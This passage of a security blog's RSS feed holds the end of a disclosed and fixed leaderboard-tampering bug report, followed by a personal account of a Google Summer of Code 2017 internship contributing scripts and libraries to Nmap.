<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195556504/0HCefaO-h.png" alt="POC-minesweeper-burp-01-hide.png" /></p>
<p>Send another request to check the leaderboard scores. We will see that we are ranked 1st on the leaderboard</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195575415/9dsg-3OfW.png" alt="POC-minesweeper-burp-02-hide.png" /></p>
<p>Upon submitting this request, we can see that our data was successfully registered in the database and we can see it in the global highscores list as well.</p>
<h3 id="heading-result">RESULT</h3>
<p>Expert level challenge solved in 0.01 seconds without even playing the game!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195615457/AOfzut3Yd.png" alt="POC-expert-level-global-rank-edit.png" /></p>
<p>These bugs are fixed in the latest version of the application.</p>
<hr />

<h3 id="heading-researchers">RESEARCHERS</h3>
<ul>
<li><a target="_blank" href="https://www.linkedin.com/in/rewanthcool/">Rewanth Tammana</a> </li>
<li><a target="_blank" href="https://www.linkedin.com/in/hrushikeshkakade/">Hrushikesh Kakade</a> </li>
</ul>
<h3 id="heading-timelilne">TIMELILNE</h3>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>Status</strong></td><td><strong>Date</strong></td></tr>
</thead>
<tbody>
<tr>
<td>Bug Submitted</td><td>19 February 2020</td></tr>
<tr>
<td>Bug Triaged</td><td>25 February 2020</td></tr>
<tr>
<td>Bug Resolved</td><td>13 March 2020</td></tr>
</tbody>
</table>
</div>]]></content:encoded></item><item><title><![CDATA[GSOC 2017 with Nmap Security Scanner]]></title><description><![CDATA[GSOC 2017 with Nmap Security Scanner
Before we go any further, I thank each and every one who helped me in my way to achieving this. But for this document, I would like to limit them to my mentors Daniel Miller and Fyodor from Nmap for choosing me ov...]]></description><link>https://blog.rewanthtammana.com/gsoc-2017-with-nmap-security-scanner-1</link><guid isPermaLink="true">https://blog.rewanthtammana.com/gsoc-2017-with-nmap-security-scanner-1</guid><category><![CDATA[Open Source]]></category><category><![CDATA[network]]></category><category><![CDATA[gsoc]]></category><category><![CDATA[hacking]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Sun, 23 May 2021 13:27:02 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1621777087980/Zkg3TKJ9W.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-gsoc-2017-with-nmap-security-scanner">GSOC 2017 with Nmap Security Scanner</h1>
<p>Before we go any further, I thank each and every one who helped me in my way to achieving this. But for this document, I would like to limit them to my mentors <a target="_blank" href="https://twitter.com/bonsaiviking">Daniel Miller</a> and <a target="_blank" href="http://insecure.org/fyodor//">Fyodor</a> from Nmap for choosing me over several other applicants from all over the globe and for guiding me through the whole process, providing me invaluable resources at times of need and for being so supportive throughout my internship.</p>
<p>This article is divided into the following sub-sections.</p>
<ol>
<li><p><a class="post-section-overview" href="#fe2e">Hitting it off with Nmap.</a></p>
</li>
<li><p><a class="post-section-overview" href="#b257">Application period coding.</a></p>
</li>
<li><p><a class="post-section-overview" href="#1a2f">Official coding starts.</a></p>
</li>
<li><p><a class="post-section-overview" href="#4846">My GSOC codebase.</a>(Open this to directly access my contributions list)</p>
</li>
<li><p><a class="post-section-overview" href="#6f9b">Things I learned through GSOC.</a></p>
</li>
</ol>
<h1 id="heading-hitting-it-off-with-nmap">Hitting it off with Nmap</h1>
<p>It was in March 2017, I was told by one of my seniors about <a target="_blank" href="https://summerofcode.withgoogle.com/">Google Summer of Code</a>. I’m a penetration tester and security enthusiast (Web application security). So, without any delay, I started to see the list of organizations that work on security. There were only a total of 6 organizations and 5 of them caught my interest. They were Metasploit, Nmap, Tor, Honeypot, and Radare2. I thought of applying for at least 3 of them and started to do my research on each of them. After a day or two, my inner soul started saying, “You were using Nmap for the past 2 years, and it's now the time for you to show tribute to Nmap.” Without any second thought, I made up my mind to contribute to Nmap leaving all the other options behind.</p>
<h1 id="heading-application-period-coding">Application period coding</h1>
<p>I realized that I’m far away from my peers in terms of knowledge of the Nmap codebase and other things related to Nmap. Initially, I was a bit worried when I went over to the IRC channel(#Nmap) and found that many of them started their GSOC preparation in Dec’16 and I just started 10–15 days before the deadline. Nmap has its Scripting Engine known as NSE(Nmap Scripting Engine) for writing the scripts which are written in LUA. I never heard of this language before and on top of that I was left with very few days, still, I didn’t lose hope and since I’m a quick learner I was able to learn the language faster than anyone can. But just going through a pair of tutorial websites quickly doesn’t mean you are good with the language. So, to convince myself that I’m good at LUA, I developed a small project in LUA within a day. My LUA project automatically converts your Mozilla browser into a hacker tool kit by installing all the required add-ons.</p>
<p>Once I was familiar with LUA, I started to read the Nmap codebase. Nmap isn’t a single tool by itself. It has several other tools like Ncat, Nping, Ndiff, and Zenmap. One can contribute to any of these 5 tools through GSOC.</p>
<p>The Nmap developers on the IRC channel were very helpful. Once I found myself comfortable with the codebase I checked the issues page and picked an issue that matched my interest and I made my first PR. Later on, I felt that going only through the Github Issue Tracker will not help me to write great scripts. Since I’m familiar with Nmap usage, I knew the pros and cons of the available scripts. While I was doing my pentest during my internship, I needed a few scripts and those were missing in Nmap. I felt like implementing them would help other hackers during their pentests. This way I started to contribute to Nmap.</p>
<p>A few of my PRs were merged with Nmap very quickly. Yayyy…. felt very happy from the inside since I made Nmap better. This incident increased my respect towards Open Source and Nmap.</p>
<p>I started being active on the IRC channels and started making PRs on Github. I submitted my GSOC application two minutes before the deadline. Ufff….. felt like I was just re-born because Google doesn’t extend the deadline at any cost.</p>
<p>The results were compiled in a month, in the meanwhile I got myself familiar with Nmap completely and started contributing. In that one month, I got invaluable help from the Open Source community and Nmap developers which improved my coding abilities and familiarity with the Nmap codebase.</p>
<p>To be frank, I forgot that I applied for GSOC and I was immersed in contributing to Nmap I felt proud from the inside since I was able to help other hackers by improving Nmap source code. I was submerged in contributing to Nmap, I got a call from my senior at around 23:00 on May 4 saying I got selected into Nmap. Hurrah…..!! I was on cloud9 since I got the chance to work with Nmap through Google.</p>
<h1 id="heading-official-coding-starts">Official coding starts</h1>
<p><img src="https://miro.medium.com/max/4096/1*_dfhyjJY7Wk_z3dY4IsTqw.jpeg" alt /></p>
<p>Me above, screwed up with decoding SMB responses (Binary data).</p>
<p>I got myself active on GSOC’17 Whatsapp groups, Facebook groups, Telegram channels, Slack channels, IRCs, and so on. I got a chance to meet the best talent from all over the world. I now have connections all over the globe.</p>
<p>I got some resources from my mentor which I had to go through before I started actual coding. Since I was anxious, without asking my mentor’s permission I took the chance to work on the ideas I submitted in my GSOC proposal which I later on found was one of the biggest mistakes I had done. Read the next two sections to know why.</p>
<h2 id="heading-dollar-autocomplete-feature-for-nmap">$ autocomplete feature for Nmap</h2>
<p>Previously, all the developers have to type the commands completely to run their scripts. There are hundreds of scripts and each script has tens of arguments that no one can ever master. So, what happened was every hacker had to check the script file or documentation for using Nmap. I felt like it would be cool if we can provide a feature that can autocomplete the args upon double-tapping [TAB]. I noticed that my mentor has a private repo that provides this functionality but it fails to autocomplete the inner arguments that a script expects the user to provide. So, I thought adding that feature would be cool and I started coding it right away without his permission.</p>
<p>I made a PR <a target="_blank" href="https://github.com/bonsaiviking/nmap-completion/pull/4/files">#4</a> which closed issue <a target="_blank" href="https://github.com/bonsaiviking/nmap-completion/issues/1">#1</a> as well in the private repo.</p>
<h2 id="heading-dollar-colored-output-for-nmap">$ colored output for Nmap</h2>
<p><img src="https://miro.medium.com/max/3840/1*0voV-Nz4ApHzkhv-I5YC6g.png" alt /></p>
<p><img src="https://miro.medium.com/max/3840/1*6bS3ChsM7JbRa2U2vVpsQg.png" alt /></p>
<p>Screenshots of colored output for easy debugging purposes.</p>
<p>There are several options in Nmap for debugging purposes. But these debugging messages can’t be easily identified by an n00b. So, enabling this feature will increase user readability by making it easier to examine the detailed output along with debugging info.</p>
<p>I was very happy thinking that both the above PRs will be merged with the Nmap master branch. But sadly, both of them were turned down by my mentor, saying that this autocomplete feature and colored output will work great on Linux(bash) only and might fail on other shells like zsh, ksh, and so on. Most importantly both the above-mentioned features will not work on Windows due to lack of support. I felt very bad that I should have discussed implementing these ideas with my mentor beforehand. So, these PRs were rejected from being merged into the master branch but can be maintained in a private repo which I’m planning to release soon.</p>
<p>Until now I was trying to make enhancements that would help an n00b hacker but then I felt like making something useful for everyone.</p>
<h2 id="heading-dollar-refactoring-http-enum-script">$ refactoring http-enum script</h2>
<p>The http-enum script is structured in a very old fashion. I had discussions with my mentor for more than 2 weeks regarding the changes to be made. I created a report which explains the shortcomings, new features, and improvements that can be made to optimize the script.</p>
<blockquote>
<p>Report is available on Google docs,</p>
<p><a target="_blank" href="https://goo.gl/ubkV2E">https://goo.gl/ubkV2E</a></p>
</blockquote>
<p>Since we were hit with some other important tasks to complete and issues on the tracker were increasing rapidly, we thought of continuing this enhancement later on.</p>
<h2 id="heading-dollar-added-missing-ip-protocols-to-netutilcc">$ added missing ip protocols to netutil.cc</h2>
<p>Some important IP protocols were missing from the list in netutil.cc which is being widely used. I added the important, missing protocols to the existing file. Nmap already has a mapping of protocol numbers to names, based on <a target="_blank" href="https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml#protocol-numbers-1">IANA’s assignment registry</a>, namely the_nmap-protocols_file.</p>
<p>Merged proto2ascii_case and nexthdrtoa functions which return protocol name. Removed proto2ascii_lowercase function by writing a modular code for one of the existing functions.</p>
<p>I wrote a shell script to generate the code from the nmap-protocols file. This will be more efficient than reading and parsing the file at run time and will also make libnetutil not dependent on an external file at run time. This is important for things like Ncat and Nping that are not usually packaged with the nmap-protocols file.</p>
<h2 id="heading-dollar-fixed-issues-related-to-cve-20143704-nse-script">$ fixed issues related to cve-2014–3704 nse script</h2>
<p>There was issue #902 related to the malfunctioning of the cve2014–3704 script. That was a very typical issue. When this script was executed against a vulnerable server, a false output was generated. I tried exploiting the vulnerable server using Metasploit, and it was successful but when I tried to exploit it using the Nmap script there was a failure. I compared the code of Metasploit and Nmap scripts and both looked the same.</p>
<p>I thought there might be an issue with the way the packets were sent by the POST request in Nmap. I started to intercept the packets of both Metasploit and Nmap separately while exploiting the server using Wireshark. I observed that Nmap packets were crafted in a different format compared to Metasploit. I tried very hard for one complete week trying to figure out why the post data sent by both tools are different. After a week, I got a hacker on the Metasploit IRC channel to answer my question and I resolved the issue by sending the request.</p>
<p>Later on, I found that Drupal is having two login pages and only one of them is vulnerable both the URLs are different by just a single character and I felt bad that I should have observed that in the first place. I changed the endpoints of the target server in Nmap and everything was in place.</p>
<h2 id="heading-dollar-enhancement-made-to-cve-20143704-nse-script">$ enhancement made to cve-2014–3704 nse script</h2>
<p>After we attack the server, we have to check for traces of compromised instances but this is not properly done by the existing Nmap script. I don’t say it's entirely wrong but it just doesn’t work in all cases. For example, if the vulnerable website is present in Spanish or French then the existing script cannot return the correct output regarding the vulnerability. I added new conditions which check for multiple traces of compromise and then confirm the vulnerability.</p>
<h2 id="heading-dollar-wrote-script-for-openwebnet-protocol-discovery">$ wrote script for OpenWebNet protocol discovery</h2>
<p>OpenWebNet Protocol is a communications protocol developed by Bticino since 2000. This protocol is mainly used for Home Automation purposes. This protocol is widely used yet good documentation is scarce for its usage. Only 2 websites are existing, which helped me in writing this script.</p>
<p>This new script can get information like IP Address, Net Mask, MAC address, Device Type, Firmware Version, Server Uptime, Date and Time, Kernel Version, and Distribution Version from the target. Apart from that, it can retrieve the number of automated devices, number of lights, number of burglar alarms, number of heating devices, and so on.</p>
<p>So, it will be a very useful script during the enumeration of home automated appliances as it is capable of fetching so many details from the target.</p>
<h2 id="heading-dollar-removed-redundant-parsing-functions-by-making-enhancements">$ removed redundant parsing functions by making enhancements</h2>
<p>Previously two functions from two different libraries were used for parsing the websites. Each of the functions had some extra functionality wrt others but shared code to some extent. I combined them into one function. This particular commit is a good cleanup of redundant code.</p>
<h2 id="heading-dollar-developed-punycode-and-idna-libraries-for-nmap">$ developed punycode and idna libraries for nmap</h2>
<p>The existing Nmap crawler can send requests to domain names only in English.</p>
<p>If you try to crawl websites like “http://點看.com”_or “_http://योगा.भारत” you get an error saying the URL cannot be decoded.</p>
<p>I created Punycode and IDNA libraries with functions that let you encode and decode this kind of stuff. For example,</p>
<p>“http://點看.com” gets decoded into “http://xn — c1yn36f.com”.</p>
<p><em>“http://योगा.भारत” gets decodes into“</em><a target="_blank" href="http://xn--31b1c3b9b.xn--h2brj9c">http://xn--31b1c3b9b.xn--h2brj9c</a>”.</p>
<p>Crawlers can now crawl the website by using the decoded URLs.</p>
<p>Developing these libraries had been a very challenging part. I never had the habit of reading technical papers from the first line to the bottom line. I had to read the papers thoroughly to write proper functions.</p>
<blockquote>
<p>Completing this task requires high dedication because I had to read papers like UTS #46, RFC 3490, RFC 3491, RFC 3492, RFC 3493, TR#46, TR #9 and then analyze the data provided in all the above technical papers and then create the respective functions.</p>
</blockquote>
<p>The real part comes here, I completely coded as mentioned in the technical standards and the code doesn’t work properly as expected. All cases were successful except one or two and then comes the highest level of depression. I didn’t have the balls to find the bug in the code because I wasn’t ready to go through 1500 lines of code, I had to go through the research papers again and I had to cross-check the code with the procedure as mentioned in the papers. Finally, after so much struggle I successfully developed the libraries.</p>
<blockquote>
<p>At this point, I was fatigued working only on web-related stuff and felt like needing a change of pace. I thought of working on something which has nothing to do with the web and the following are my achievements in other parts of Nmap.</p>
</blockquote>
<h2 id="heading-dollar-ncat-enhancement-limit-data-using-a-delimiter">$ ncat enhancement - limit data using a delimiter</h2>
<p>Ncat is a reimplementation of the currently splintered and reasonably unmaintained Netcat family. Ncat can act as either a client or server, using TCP or UDP over IPv4 or IPv6. SSL support is provided for both the client and server modes.</p>
<p>Till now I was working on LUA since the start of the GSOC and for the first time, I was hit with the idea of working with something different apart from Web and LUA. This enhancement was purely implemented in the C language.</p>
<p>This will be a good enhancement to the existing Ncat once the PR gets merged. Functions were added to accept delimiter as a parameter through the command line for delimiting the data before sending it.</p>
<blockquote>
<p>At this stage I was like, my GSOC is about to be complete and I haven’t done anything new. I was just getting better at what I already knew. I wanted to learn and contribute more. I wanted to work on something totally new to me.</p>
<p>I selected to work on Windows SMB-related stuff. I didn’t even know what SMB meant until this point. I requested my mentor to allow me to work on this new area. I was left with only 10 days before I started to work on SMB.</p>
</blockquote>
<h2 id="heading-dollar-script-to-fetch-smb-enum-services-from-remote-windows-machine">$ script to fetch smb enum services from remote windows machine</h2>
<p><img src="https://miro.medium.com/max/3840/1*bgnyffQP7govqkdfJCiRdg.png" alt /></p>
<p>Random capture of response sent by Windows</p>
<p>SMB protocol is used by Windows. I had written a script that fetches the list of services running on a remote windows system along with their service status message. This has been the most challenging part of my entire GSOC stage.</p>
<p>I had less than 2 weeks to complete this task and I just started learning the definitions of SMB, CIFS, and so on. Once I was done with understanding the definitions, I tried to write the code. But I wasn’t familiar at all with protocols like SMB, DCERPC, SVCCTL, and so on. We can’t send a GET/POST request directly as we do on protocols like HTTP/HTTPS. It's a new game.</p>
<p>I found software created by windows to list the services, <a target="_blank" href="https://docs.microsoft.com/en-us/sysinternals/downloads/psservice">psservices.exe</a>. I intercepted the packets sent by psservices.exe. I thought I could easily replicate the requests being sent based on this data.</p>
<p><img src="https://miro.medium.com/max/3840/1*UYfLzymUIE_ESkHgh3F4QA.png" alt /></p>
<p>After seeing the capture I was like WTF is going on? I understood how the requests were being sent but I didn’t know how to code them. I got some useful resources from my mentor, then I figured out a way to establish the connection. Finally, wow.. I made the connection and the response looked something like this.</p>
<p><img src="https://miro.medium.com/max/3840/1*IJQ7n0hcVYSqa--bMtpHVw.png" alt /></p>
<p>Debugging output which shows a part of the request and response sent to the server</p>
<p><img src="https://miro.medium.com/max/3840/1*sTUrd3bTTcXslYQlHnumGw.png" alt /></p>
<p>Piece of response data received from the Windows server after making a svcctl request</p>
<p>I was so happy when I got the response from the server and I thought its almost done.</p>
<blockquote>
<p>The response is binary data and unmarshalling or decoding the binary data was a very tricky and challenging task during my whole GSOC period.</p>
</blockquote>
<p>After a long struggle for two days, the binary data decoded was unmarshalled and it displayed all the services with their service name, display name, and service status respectively.</p>
<p>Taking up this very challenging task with a narrow deadline gave me immense pleasure of participating in GSOC and I did learn many new things related to Windows protocol and decoding binary data.</p>
<h1 id="heading-my-gsoc-codebase">My GSOC codebase</h1>
<p>This section contains the links to the work I have done so far through GSOC.</p>
<p>The below data is taken on Sep 28, 2017.</p>
<p><img src="https://miro.medium.com/max/3628/1*AIwF_v2_-xxYQp3Mheq4Mg.jpeg" alt /></p>
<h2 id="heading-merged-commits-total-23">Merged commits: Total 23</h2>
<h2 id="heading-opened-prs-total-12">Opened PRs: Total 12</h2>
<p><a target="_blank" href="https://github.com/nmap/nmap/pulls/rewanthtammana">https://github.com/nmap/nmap/pulls/rewanthtammana</a></p>
<h2 id="heading-my-closed-prs-total-21">My Closed PRs: Total 21</h2>
<p><a target="_blank" href="https://github.com/nmap/nmap/pulls?q=is%3Aclosed+is%3Apr+author%3Arewanthtammana+">https://github.com/nmap/nmap/pulls?q=is%3Aclosed+is%3Apr+author%3Arewanthtammana+</a></p>
<ul>
<li><p><strong>Closed others PRs</strong>: 2 (<a target="_blank" href="https://github.com/nmap/nmap/pull/728">#728</a>,<a target="_blank" href="https://github.com/nmap/nmap/pull/896">#896</a>)</p>
</li>
<li><p><strong>My opened issues</strong>: 2 (<a target="_blank" href="https://github.com/nmap/nmap/issues/741">#741</a>,<a target="_blank" href="https://github.com/nmap/nmap/issues/748">#748</a>)</p>
</li>
<li><p><strong>Closed others issues</strong>: 2 (<a target="_blank" href="https://github.com/nmap/nmap/issues/726">#726</a>,<a target="_blank" href="https://github.com/nmap/nmap/issues/902">#902</a>)</p>
</li>
</ul>
<h1 id="heading-things-i-learned-through-gsoc">Things I learned through GSOC</h1>
<ul>
<li><p>Learned the kind of background work needed to be done before starting to write the main code.</p>
</li>
<li><p>Collaborate with highly experienced people remotely.</p>
</li>
<li><p>Breaking the code into components at each stage. In other words, learned to write modular code effectively.</p>
</li>
<li><p>Effectively reading technical and research papers.</p>
</li>
<li><p>Techniques to be followed while refactoring existing code.</p>
</li>
<li><p>Writing scalable code. Experience with openwebnet-discovery protocol script taught this point very well.</p>
</li>
<li><p>Improved my exploitation script writing skills.</p>
</li>
<li><p>Quickly switch the tasks over and over with ease.</p>
</li>
<li><p>Gained knowledge of the SMB protocol and unmarshalling hexdump.</p>
</li>
<li><p>Analyzing the transfer of packets over Wireshark to find the errors.</p>
</li>
<li><p>Networking.</p>
</li>
<li><p>Don’t dive into new areas directly without any prior knowledge.</p>
</li>
</ul>
<p>Finally, a quote from_The Pragmatic Programmer_book that inspired me -</p>
<blockquote>
<p>“Writing code that writes code” differentiates the best from rest and I did this throughout my internship period ;)</p>
</blockquote>
]]></content:encoded></item></channel></rss>